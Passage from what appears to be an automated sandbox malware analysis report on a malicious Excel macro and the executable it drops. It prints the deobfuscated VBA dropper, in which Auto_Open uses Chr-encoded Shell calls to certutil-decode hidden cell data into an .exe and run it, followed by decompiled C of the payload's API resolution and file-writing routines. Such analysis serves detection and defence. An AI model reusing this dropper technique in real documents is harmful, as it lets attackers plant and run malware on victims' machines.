58	Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)	Shell("certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe") -> 3388 Chr executed
60	Sleep 2000	kernel32!Sleep(2000) executed
61	Shell (expath)	Shell("C:\Programdata\M4P9S1S3.exe") -> 3412 executed
62	End Sub

Subroutine TQuH8wDO, APIs: 14, Strings: 0, Number of lines: 5, Relevance: 17.505

APIs	Meta Information
Part of subcall function GetVal@LinesOfBusiness: Cells
Part of subcall function cutil@LinesOfBusiness: vbNewLine
Part of subcall function cutil@LinesOfBusiness: vbNewLine
Part of subcall function cutil@LinesOfBusiness: rndname
Part of subcall function cutil@LinesOfBusiness: rndname
Part of subcall function cutil@LinesOfBusiness: CreateObject
Part of subcall function cutil@LinesOfBusiness: CreateObject
Part of subcall function cutil@LinesOfBusiness: CreateTextFile
Part of subcall function cutil@LinesOfBusiness: Write
Part of subcall function cutil@LinesOfBusiness: Close
Part of subcall function cutil@LinesOfBusiness: Shell
Part of subcall function cutil@LinesOfBusiness: Chr
Part of subcall function cutil@LinesOfBusiness: Sleep
Part of subcall function cutil@LinesOfBusiness: Shell

Line	Instruction	Meta Information
65	Sub TQuH8wDO()
66	Dim p as String	executed
67	p = GetVal(2227, 2248, 170)
68	cutil (p)
69	End Sub

Function GetRand, APIs: 6, Strings: 0, Number of lines: 13, Relevance: 7.513

APIs	Meta Information
Randomize
Chr
Int
Rnd
Int
Rnd

Line	Instruction	Meta Information
19	Function GetRand()
20	Dim r as String	executed
21	Dim i as Integer
23	Randomize	Randomize
24	For i = 1 To 8
25	If i Mod 2 = 0 Then
26	r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r	Chr Int Rnd
27	Else
28	r = Int((9 * Rnd) + 1) & r	Int Rnd
29	Endif
30	Next i
31	GetRand = r
32	End Function

Function GetVal, APIs: 1, Strings: 0, Number of lines: 7, Relevance: 1.257

APIs	Meta Information
Cells

Line	Instruction	Meta Information
10	Function GetVal(sr as Long, er as Long, c as Long)
11	Dim x	executed
12	For i = sr To er
13	x = x + Cells(i, c)	Cells
14	Next
15	GetVal = x
16	End Function

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Executed Functions

Subroutine Auto_Open, APIs: 2, Strings: 1, Number of lines: 4, Relevance: 7.004

APIs	Meta Information
Range
vbBlack

Strings	Decrypted Strings
"a1:c54"

Line	Instruction	Meta Information
2	Sub Auto_Open()
3	ActiveSheet.Range("a1:c54").Font.Color = vbBlack	Range vbBlack executed
4	Call LinesOfBusiness.TQuH8wDO()
7	End Sub

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: M4P9S1S3.exe PID: 3412 Parent PID: 3300

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1827
Total number of Limit Nodes:	52

Executed Functions

Function 002413F7, Relevance: 13.6, APIs: 9, Instructions: 128
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E002413F7(void* __ecx, signed int _a4) {
				void* _v8;
				CHAR* _v12;
				CHAR* _v16;
				signed int _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				_Unknown_base(*)()* _v36;
				struct HINSTANCE__** _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				void* __edi;
				void* __esi;
				CHAR* _t51;
				short _t52;
				short _t53;
				short _t54;
				short _t55;
				_Unknown_base(*)()* _t61;
				_Unknown_base(*)()* _t62;
				void* _t69;
				struct HINSTANCE__* _t70;
				struct HINSTANCE__* _t72;
				void* _t79;
				long _t80;
				struct HINSTANCE__* _t86;
				signed int _t89;
				struct HINSTANCE__** _t91;
				void* _t95;
				intOrPtr* _t96;
				struct HINSTANCE__* _t99;

				_t89 = _a4;
				if(_t89 <  *((intOrPtr*)(__ecx + 8))) {
					_push(_t95);
					_t91 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + _t89 * 4));
					_v40 = _t91;
					_t96 = E002429BD(_t89, _t95, __eflags, 0x10);
					 *((intOrPtr*)(_t96 + 8)) = 0x25b784;
					 *((intOrPtr*)(_t96 + 0xc)) = 0xb;
					 *_t96 = 0x25b790;
					 *((intOrPtr*)(_t96 + 4)) = 0x1f;
					_v12 = E00241DEF(_t96, _t89, _t91);
					 *_t96 = 0x25b770;
					 *((intOrPtr*)(_t96 + 4)) = 0x14;
					_t51 = E00241DEF(_t96, _t89, _t91);
					_v16 = _t51;
					_t52 = 0x6e;
					_v52 = _t52;
					_t53 = 0x74;
					_v50 = _t53;
					_t54 = 0x64;
					_v48 = _t54;
					_t55 = 0x6c;
					_v46 = _t55;
					_v44 = _t55;
					_v42 = 0;
					_t86 = LoadLibraryW( &_v52);
					_v8 = _t86;
					__eflags = _t86;
					if(_t86 != 0) {
						_t80 =  *(_t91 + 8);
						_v28 =  *((intOrPtr*)(_t91 + 0xc));
						_v32 =  *((intOrPtr*)(_t91 + 4));
						_t61 = GetProcAddress(_t86, _v12);
						_t62 = GetProcAddress(_v8, _v16);
						_v20 = _v20 & 0x00000000;
						_v36 = _t62;
						 *_t61(0x102,  &_v24,  &_v20, _t79);
						_v8 = HeapAlloc(GetProcessHeap(), 8, _v24);
						_t69 = RtlAllocateHeap(GetProcessHeap(), 8, _t80); // executed
						__eflags = _v8;
						_t99 = _t69;
						if(_v8 == 0) {
							L9:
							_t70 = 0;
							__eflags = 0;
							L10:
							L11:
							return _t70;
						}
						__eflags = _t99;
						if(_t99 == 0) {
							goto L9;
						}
						_a4 = _a4 & 0x00000000;
						_t72 = _v36(0x102, _t99, _t80, _v32, _v28,  &_a4);
						__eflags = _t72;
						if(_t72 != 0) {
							goto L9;
						}
						__eflags = _a4 - _t80;
						if(_a4 != _t80) {
							goto L9;
						}
						 *_v40 = _t99;
						HeapFree(GetProcessHeap(), 8, _v8);
						E002429B8(_v12);
						E002429B8(_v16);
						_t70 = 1;
						goto L10;
					}
					_t70 = 0;
					goto L11;
				}
				return 0;
			}

0x002413fa
0x00241403
0x0024140f
0x00241413
0x00241416
0x0024141e
0x00241423
0x0024142a
0x00241431
0x00241437
0x00241445
0x00241448
0x0024144e
0x00241455
0x0024145c
0x0024145f
0x00241462
0x00241466
0x00241469
0x0024146d
0x0024146e
0x00241474
0x00241475
0x00241479
0x0024147f
0x0024148d
0x0024148f
0x00241492
0x00241494
0x002414aa
0x002414ad
0x002414b4
0x002414b7
0x002414c1
0x002414c3
0x002414c7
0x002414d7
0x002414f2
0x002414f8
0x002414fa
0x002414fe
0x00241500
0x00241550
0x00241550
0x00241550
0x00241552
0x00241553
0x00000000
0x00241554
0x00241502
0x00241504
0x00000000
0x00000000
0x00241506
0x0024151b
0x0024151e
0x00241520
0x00000000
0x00000000
0x00241522
0x00241525
0x00000000
0x00000000
0x0024152f
0x00241534
0x0024153d
0x00241545
0x0024154c
0x00000000
0x0024154c
0x00241496
0x00000000
0x00241496
0x00000000

APIs

LoadLibraryW.KERNEL32(?), ref: 00241487
GetProcAddress.KERNEL32(00000000,0025B784), ref: 002414B7
GetProcAddress.KERNEL32(00000014,0000000B), ref: 002414C1
GetProcessHeap.KERNEL32(00000008,?), ref: 002414E4
HeapAlloc.KERNEL32(00000000), ref: 002414ED
GetProcessHeap.KERNEL32(00000008,0025B784), ref: 002414F5
RtlAllocateHeap.NTDLL(00000000), ref: 002414F8
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00241531
HeapFree.KERNEL32(00000000), ref: 00241534

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00241E47, Relevance: 10.0, APIs: 8, Instructions: 50

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00241E47(intOrPtr* __ecx) {
				void** _t22;
				signed int _t27;
				intOrPtr* _t28;

				_t28 = __ecx;
				_t27 = 0;
				 *__ecx = 0x2597f0;
				if( *((intOrPtr*)(__ecx + 8)) > 0) {
					do {
						_t22 =  *( *(_t28 + 4) + _t27 * 4);
						if(_t22 != 0) {
							if( *_t22 != 0) {
								HeapFree(GetProcessHeap(), 8,  *_t22); // executed
							}
							if(_t22[4] != 0) {
								HeapFree(GetProcessHeap(), 8, _t22[4]); // executed
							}
							if(_t22[5] != 0) {
								HeapFree(GetProcessHeap(), 8, _t22[5]);
							}
							_push(0x28);
							E002429F9(_t22);
						}
						_t27 = _t27 + 1;
					} while (_t27 <  *((intOrPtr*)(_t28 + 8)));
				}
				return HeapFree(GetProcessHeap(), 8,  *(_t28 + 4));
			}

0x00241e48
0x00241e4b
0x00241e4d
0x00241e56
0x00241e59
0x00241e5c
0x00241e61
0x00241e66
0x00241e73
0x00241e73
0x00241e7d
0x00241e8b
0x00241e8b
0x00241e95
0x00241ea3
0x00241ea3
0x00241ea9
0x00241eac
0x00241eb2
0x00241eb3
0x00241eb4
0x00241eb9
0x00241ece

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,00241FF8), ref: 00241E6C
HeapFree.KERNEL32(00000000), ref: 00241E73
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00241FF8), ref: 00241E84
HeapFree.KERNEL32(00000000), ref: 00241E8B
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00241FF8), ref: 00241E9C
HeapFree.KERNEL32(00000000), ref: 00241EA3
GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00241FF8), ref: 00241EBF
HeapFree.KERNEL32(00000000), ref: 00241EC6

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00242FDE, Relevance: 6.1, APIs: 4, Instructions: 53
timethread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00242FDE() {
				signed int _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t21;
				signed int _t29;
				signed int _t32;
				signed int _t36;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t21 =  *0x25b018; // 0x6083b07a
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = _v8 ^ GetCurrentProcessId();
					QueryPerformanceCounter( &_v24); // executed
					_t29 =  &_v8;
					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
					if(_t36 != 0xbb40e64e) {
						if((0xffff0000 & _t36) == 0) {
							_t29 = (_t36 | 0x00004711) << 0x10;
							_t36 = _t36 | _t29;
						}
					} else {
						_t36 = 0xbb40e64f;
					}
					 *0x25b018 = _t36;
					 *0x25b014 =  !_t36;
					return _t29;
				} else {
					_t32 =  !_t21;
					 *0x25b014 = _t32;
					return _t32;
				}
			}

0x00242fe4
0x00242fe8
0x00242fec
0x00242fff
0x00243012
0x0024301e
0x00243027
0x00243030
0x00243037
0x00243040
0x00243049
0x0024304d
0x00243058
0x00243061
0x00243064
0x00243064
0x0024304f
0x0024304f
0x0024304f
0x00243066
0x0024306e
0x00000000
0x00243005
0x00243005
0x00243007
0x00000000
0x00243007

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00243012
GetCurrentThreadId.KERNEL32 ref: 00243021
GetCurrentProcessId.KERNEL32 ref: 0024302A
RtlQueryPerformanceCounter.NTDLL(?), ref: 00243037

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00243282, Relevance: 1.5, APIs: 1, Instructions: 3

C-Code - Quality: 100%

			E00243282() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0024328E); // executed
				return _t1;
			}

0x00243287
0x0024328d

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000328E), ref: 00243287

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00242030, Relevance: 84.6, APIs: 45, Strings: 3, Instructions: 609
libraryfile

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00242030(void* __edx, void* __eflags) {
				void* _v8;
				CHAR* _v12;
				short* _v16;
				short* _v20;
				short* _v24;
				short* _v28;
				short* _v32;
				void* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				short* _v60;
				void* _v64;
				struct HINSTANCE__* _v68;
				long _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				void* _t184;
				void* _t185;
				intOrPtr _t187;
				void* _t194;
				void* _t195;
				intOrPtr _t197;
				void* _t204;
				void* _t205;
				intOrPtr _t207;
				void* _t214;
				void* _t215;
				intOrPtr _t217;
				intOrPtr* _t225;
				intOrPtr _t227;
				void* _t238;
				short _t239;
				short _t240;
				short _t241;
				short _t242;
				short _t243;
				short _t244;
				short _t245;
				void* _t249;
				void _t250;
				intOrPtr _t253;
				short _t254;
				void _t255;
				void _t256;
				void _t259;
				void _t260;
				void _t263;
				void _t264;
				CHAR* _t266;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t274;
				short _t275;
				void* _t276;
				void* _t277;
				void* _t280;
				short _t281;
				char _t282;
				void* _t283;
				void* _t284;
				void* _t287;
				short _t288;
				char _t289;
				void* _t290;
				void* _t291;
				void* _t294;
				void* _t295;
				intOrPtr* _t325;
				intOrPtr* _t328;
				int _t330;
				intOrPtr _t332;
				intOrPtr* _t333;
				intOrPtr _t337;
				intOrPtr* _t338;
				intOrPtr _t342;
				intOrPtr* _t343;
				intOrPtr _t347;
				intOrPtr* _t348;
				intOrPtr _t353;
				intOrPtr* _t354;
				short _t357;
				short _t358;
				intOrPtr _t360;
				signed int _t362;
				void* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t381;
				signed int _t388;
				int _t391;
				void* _t393;
				signed int _t395;
				int _t398;
				short* _t400;
				signed int _t402;
				int _t405;
				short* _t407;
				signed int _t409;
				void* _t414;
				void* _t417;
				intOrPtr* _t418;
				intOrPtr* _t421;
				int _t423;
				intOrPtr* _t424;
				int _t426;
				intOrPtr* _t427;
				int _t429;
				intOrPtr* _t430;
				int _t432;
				intOrPtr* _t433;
				int _t435;
				intOrPtr* _t436;
				signed int _t437;
				void* _t438;
				signed int _t439;
				void* _t440;
				signed int _t441;
				void* _t442;
				signed int _t443;
				void* _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				short* _t460;
				void* _t462;
				void* _t468;
				void* _t474;
				void* _t480;
				short* _t485;
				void* _t486;
				void* _t491;
				void* _t492;
				void* _t497;
				void* _t498;
				void* _t503;
				void* _t505;
				intOrPtr* _t506;
				void* _t507;
				short* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				void* _t515;
				void* _t516;
				void* _t517;
				void* _t518;
				void* _t519;
				void* _t520;

				_t325 = E002429BD(__edx, _t505, __eflags, 0x10);
				 *((intOrPtr*)(_t325 + 8)) = 0x26130c;
				 *((intOrPtr*)(_t325 + 0xc)) = 0xb;
				 *_t325 = 0x2612d8;
				 *((intOrPtr*)(_t325 + 4)) = 0x1a;
				_t506 = E00241DEF(_t325, __edx, _t453);
				_v60 = _t506;
				_t175 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_v8 = _v8 & 0x00000000;
				_t328 = _t506;
				_v40 = _t175;
				_t8 = _t328 + 2; // 0x2
				_t417 = _t8;
				do {
					_t176 =  *_t328;
					_t328 = _t328 + 2;
				} while (_t176 != _v8);
				_t418 = _t506;
				_t330 = _t328 - _t417 >> 1;
				_t10 = _t418 + 2; // 0x2
				_t507 = _t10;
				do {
					_t177 =  *_t418;
					_t418 = _t418 + 2;
				} while (_t177 != _v8);
				WideCharToMultiByte(0, 0, _v60, (_t418 - _t507 >> 1) + (_t418 - _t507 >> 1), _v40, _t330, 0, 0);
				 *_t325 = 0x261330;
				 *((intOrPtr*)(_t325 + 4)) = 6;
				_v16 = E00241DEF(_t325, _t418 - _t507 >> 1, HeapAlloc);
				_t184 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_t421 = _v16;
				_v44 = _t184;
				_t185 = _t421 + 2;
				do {
					_t332 =  *_t421;
					_t421 = _t421 + 2;
				} while (_t332 != _v8);
				_t333 = _v16;
				_t423 = _t421 - _t185 >> 1;
				_v56 = _t333 + 2;
				do {
					_t187 =  *_t333;
					_t333 = _t333 + 2;
				} while (_t187 != _v8);
				WideCharToMultiByte(0, 0, _v16, (_t333 - _v56 >> 1) + (_t333 - _v56 >> 1), _v44, _t423, 0, 0);
				 *_t325 = 0x261338;
				 *((intOrPtr*)(_t325 + 4)) = 0x16;
				_v20 = E00241DEF(_t325, _t423, HeapAlloc);
				_t194 = RtlAllocateHeap(GetProcessHeap(), 8, 0x200); // executed
				_t424 = _v20;
				_v48 = _t194;
				_t195 = _t424 + 2;
				do {
					_t337 =  *_t424;
					_t424 = _t424 + 2;
				} while (_t337 != _v8);
				_t338 = _v20;
				_t426 = _t424 - _t195 >> 1;
				_v56 = _t338 + 2;
				do {
					_t197 =  *_t338;
					_t338 = _t338 + 2;
				} while (_t197 != _v8);
				WideCharToMultiByte(0, 0, _v20, (_t338 - _v56 >> 1) + (_t338 - _v56 >> 1), _v48, _t426, 0, 0);
				 *_t325 = 0x26135c;
				 *((intOrPtr*)(_t325 + 4)) = 0x1a;
				_v24 = E00241DEF(_t325, _t426, HeapAlloc);
				_t204 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_t427 = _v24;
				_v52 = _t204;
				_t205 = _t427 + 2;
				do {
					_t342 =  *_t427;
					_t427 = _t427 + 2;
				} while (_t342 != _v8);
				_t343 = _v24;
				_t429 = _t427 - _t205 >> 1;
				_v56 = _t343 + 2;
				do {
					_t207 =  *_t343;
					_t343 = _t343 + 2;
				} while (_t207 != _v8);
				WideCharToMultiByte(0, 0, _v24, (_t343 - _v56 >> 1) + (_t343 - _v56 >> 1), _v52, _t429, 0, 0);
				 *_t325 = 0x261350;
				 *((intOrPtr*)(_t325 + 4)) = 0xc;
				_v28 = E00241DEF(_t325, _t429, HeapAlloc);
				_t214 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_t430 = _v28;
				_v56 = _t214;
				_t215 = _t430 + 2;
				do {
					_t347 =  *_t430;
					_t430 = _t430 + 2;
				} while (_t347 != _v8);
				_t348 = _v28;
				_t432 = _t430 - _t215 >> 1;
				_v36 = _t348 + 2;
				do {
					_t217 =  *_t348;
					_t348 = _t348 + 2;
				} while (_t217 != _v8);
				WideCharToMultiByte(0, 0, _v28, (_t348 - _v36 >> 1) + (_t348 - _v36 >> 1), _v56, _t432, 0, 0);
				 *_t325 = 0x261318;
				 *((intOrPtr*)(_t325 + 4)) = 0x16;
				_v32 = E00241DEF(_t325, _t432, HeapAlloc);
				_v36 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_t225 = _v32;
				_t433 = _t225;
				_v12 = _t433 + 2;
				do {
					_t353 =  *_t433;
					_t433 = _t433 + 2;
				} while (_t353 != _v8);
				_t354 = _t225;
				_t435 = _t433 - _v12 >> 1;
				_v12 = _t354 + 2;
				do {
					_t227 =  *_t354;
					_t354 = _t354 + 2;
				} while (_t227 != _v8);
				WideCharToMultiByte(0, 0, _v32, (_t354 - _v12 >> 1) + (_t354 - _v12 >> 1), _v36, _t435, 0, 0);
				_v8 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_t510 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_v32 = _t510;
				_t238 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_v12 = _t238;
				_t239 = 0x4b;
				_t357 = 0x65;
				_v112 = _t239;
				_t240 = 0x72;
				_v108 = _t240;
				_t241 = 0x6e;
				_v106 = _t241;
				_v110 = _t357;
				_v104 = _t357;
				_t358 = 0x6c;
				_t242 = 0x33;
				_v100 = _t242;
				_t243 = 0x32;
				_v98 = _t243;
				_t244 = 0x2e;
				_v96 = _t244;
				_t245 = 0x64;
				_v94 = _t245;
				_v88 = 0;
				_v102 = _t358;
				_v92 = _t358;
				_v90 = _t358;
				_v68 = LoadLibraryW( &_v112);
				_t249 = E0024592D(_t325, _t435, 0, _v52);
				_t436 = _t249;
				_v64 = _t249;
				do {
					_t360 =  *_t436;
					_t436 = _t436 + 1;
				} while (_t360 != 0);
				_t437 = _t436 - _t249;
				_t511 = _t510 - 1;
				do {
					_t250 =  *(_t511 + 1);
					_t511 = _t511 + 1;
				} while (_t250 != 0);
				_t512 = _v64;
				_t362 = _t437 >> 2;
				memcpy(_t511, _t512, _t362 << 2);
				memcpy(_t512 + _t362 + _t362, _t512, _t437 & 0x00000003);
				_t367 = _v32;
				_t460 = _t367 - 1;
				do {
					_t253 =  *((intOrPtr*)(_t460 + 1));
					_t460 = _t460 + 1;
				} while (_t253 != 0);
				_t254 =  *0x259810; // 0x5c
				_t438 = _t367;
				 *_t460 = _t254;
				_t513 = _t438;
				do {
					_t255 =  *_t438;
					_t438 = _t438 + 1;
				} while (_t255 != 0);
				_t439 = _t438 - _t513;
				_t462 = _v12 - 1;
				do {
					_t256 =  *(_t462 + 1);
					_t462 = _t462 + 1;
				} while (_t256 != 0);
				_t369 = _t439 >> 2;
				memcpy(_t462, _t513, _t369 << 2);
				_t440 = _v48;
				memcpy(_t513 + _t369 + _t369, _t513, _t439 & 0x00000003);
				_t514 = _t440;
				do {
					_t259 =  *_t440;
					_t440 = _t440 + 1;
				} while (_t259 != 0);
				_t441 = _t440 - _t514;
				_t468 = _v32 - 1;
				do {
					_t260 =  *(_t468 + 1);
					_t468 = _t468 + 1;
				} while (_t260 != 0);
				_t375 = _t441 >> 2;
				memcpy(_t468, _t514, _t375 << 2);
				_t442 = _v36;
				memcpy(_t514 + _t375 + _t375, _t514, _t441 & 0x00000003);
				_t515 = _t442;
				do {
					_t263 =  *_t442;
					_t442 = _t442 + 1;
				} while (_t263 != 0);
				_t443 = _t442 - _t515;
				_t474 = _v12 - 1;
				do {
					_t264 =  *(_t474 + 1);
					_t474 = _t474 + 1;
				} while (_t264 != 0);
				_t381 = _t443 >> 2;
				_t266 = memcpy(_t474, _t515, _t381 << 2);
				memcpy(_t515 + _t381 + _t381, _t515, _t443 & 0x00000003);
				_v84 = 0x61657243;
				_v80 = 0x69466574;
				_v76 = 0x41656c;
				GetProcAddress(_v68, _t266);
				_t269 = CreateFileA(_v12, 4, 2, 0, 2, 2, 0); // executed
				_v68 = _t269;
				if(_t269 != 0xffffffff) {
					_t444 = _v56;
					_t516 = _t444;
					do {
						_t270 =  *_t444;
						_t444 = _t444 + 1;
						__eflags = _t270;
					} while (_t270 != 0);
					_t445 = _t444 - _t516;
					_t480 = _v8 - 1;
					__eflags = _t480;
					do {
						_t271 =  *(_t480 + 1);
						_t480 = _t480 + 1;
						__eflags = _t271;
					} while (_t271 != 0);
					_t388 = _t445 >> 2;
					memcpy(_t480, _t516, _t388 << 2);
					_t391 = _t445 & 0x00000003;
					__eflags = _t391;
					memcpy(_t516 + _t388 + _t388, _t516, _t391);
					_t393 = _v8;
					_t135 = _t393 - 1; // -1
					_t485 = _t135;
					do {
						_t274 =  *((intOrPtr*)(_t485 + 1));
						_t485 = _t485 + 1;
						__eflags = _t274;
					} while (_t274 != 0);
					_t275 =  *0x259814; // 0x20
					_t446 = _v40;
					_t517 = _t446;
					 *_t485 = _t275;
					do {
						_t276 =  *_t446;
						_t446 = _t446 + 1;
						__eflags = _t276;
					} while (_t276 != 0);
					_t447 = _t446 - _t517;
					__eflags = _t447;
					_t138 = _t393 - 1; // -1
					_t486 = _t138;
					do {
						_t277 =  *(_t486 + 1);
						_t486 = _t486 + 1;
						__eflags = _t277;
					} while (_t277 != 0);
					_t395 = _t447 >> 2;
					memcpy(_t486, _t517, _t395 << 2);
					_t398 = _t447 & 0x00000003;
					__eflags = _t398;
					memcpy(_t517 + _t395 + _t395, _t517, _t398);
					_t491 = _v8;
					_t142 = _t491 - 1; // -1
					_t400 = _t142;
					do {
						_t280 =  *((intOrPtr*)(_t400 + 1));
						_t400 = _t400 + 1;
						__eflags = _t280;
					} while (_t280 != 0);
					_t281 =  *0x259818; // 0x2220
					_t448 = _v32;
					_t518 = _t448;
					 *_t400 = _t281;
					_t282 =  *0x25981a; // 0x0
					 *((char*)(_t400 + 2)) = _t282;
					do {
						_t283 =  *_t448;
						_t448 = _t448 + 1;
						__eflags = _t283;
					} while (_t283 != 0);
					_t449 = _t448 - _t518;
					_t492 = _t491 - 1;
					__eflags = _t492;
					do {
						_t284 =  *(_t492 + 1);
						_t492 = _t492 + 1;
						__eflags = _t284;
					} while (_t284 != 0);
					_t402 = _t449 >> 2;
					memcpy(_t492, _t518, _t402 << 2);
					_t405 = _t449 & 0x00000003;
					__eflags = _t405;
					memcpy(_t518 + _t402 + _t402, _t518, _t405);
					_t497 = _v8;
					_t149 = _t497 - 1; // -1
					_t407 = _t149;
					do {
						_t287 =  *((intOrPtr*)(_t407 + 1));
						_t407 = _t407 + 1;
						__eflags = _t287;
					} while (_t287 != 0);
					_t288 =  *0x25981c; // 0x2c22
					_t450 = _v44;
					_t519 = _t450;
					 *_t407 = _t288;
					_t289 =  *0x25981e; // 0x0
					 *((char*)(_t407 + 2)) = _t289;
					do {
						_t290 =  *_t450;
						_t450 = _t450 + 1;
						__eflags = _t290;
					} while (_t290 != 0);
					_t451 = _t450 - _t519;
					_t498 = _t497 - 1;
					__eflags = _t498;
					do {
						_t291 =  *(_t498 + 1);
						_t498 = _t498 + 1;
						__eflags = _t291;
					} while (_t291 != 0);
					_t409 = _t451 >> 2;
					memcpy(_t498, _t519, _t409 << 2);
					__eflags = 0;
					_t294 = memcpy(_t519 + _t409 + _t409, _t519, _t451 & 0x00000003);
					_t520 = _v8;
					_t414 = _t520;
					_v72 = _t294;
					_t157 = _t414 + 1; // 0x1
					_t452 = _t157;
					do {
						_t295 =  *_t414;
						_t414 = _t414 + 1;
						__eflags = _t295;
					} while (_t295 != 0);
					_t503 = _v68;
					WriteFile(_t503, _t520, _t414 - _t452,  &_v72, 0); // executed
					CloseHandle(_t503);
					HeapFree(GetProcessHeap(), 8, _t520);
					HeapFree(GetProcessHeap(), 8, _v12);
					HeapFree(GetProcessHeap(), 8, _v36);
					HeapFree(GetProcessHeap(), 8, _v40);
					HeapFree(GetProcessHeap(), 8, _v44);
					HeapFree(GetProcessHeap(), 8, _v48);
					HeapFree(GetProcessHeap(), 8, _v52);
					HeapFree(GetProcessHeap(), 8, _v56);
					E002429B8(_v60);
					E002429B8(_v16);
					E002429B8(_v20);
					E002429B8(_v24);
					E002429B8(_v28);
					_push(0x10);
					E002429F9(_t325);
					__eflags = 1;
					return 1;
				}
				return 0;
			}

0x00242040
0x00242045
0x0024204c
0x00242053
0x00242059
0x0024206a
0x0024206e
0x0024207e
0x00242080
